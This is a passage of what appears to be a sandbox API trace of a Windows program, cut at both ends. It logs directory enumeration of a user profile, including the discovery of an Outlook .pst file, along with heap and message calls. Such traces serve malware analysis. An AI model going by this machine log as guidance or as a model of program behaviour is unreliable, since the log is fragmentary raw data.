ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 1 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff98 [0175.729] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0 [0175.729] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.730] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.730] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Music\\") returned="My Music\\" [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.731] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.731] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.731] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.731] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.731] PathFindFileNameW (pszPath="") returned="" [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.731] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0xffffffff [0175.731] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.731] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\") returned="My Pictures\\" [0175.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.732] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.732] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.732] PathFindFileNameW (pszPath="") returned="" [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.732] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0xffffffff [0175.732] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\") returned="My Videos\\" [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0175.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.733] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.733] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.733] PathFindFileNameW (pszPath="") returned="" [0175.733] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0xffffffff [0175.733] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.733] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0175.733] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0175.733] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.733] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.733] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.733] PathFindFileNameW (pszPath="") returned="" [0175.733] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.736] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.737] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0175.737] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 0 [0175.737] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.737] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.737] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\") returned="Links\\" [0175.737] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0175.737] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.737] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.737] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.737] PathFindFileNameW (pszPath="") returned="" [0175.737] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.737] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.738] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.738] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0175.738] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0175.738] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0175.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0175.739] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 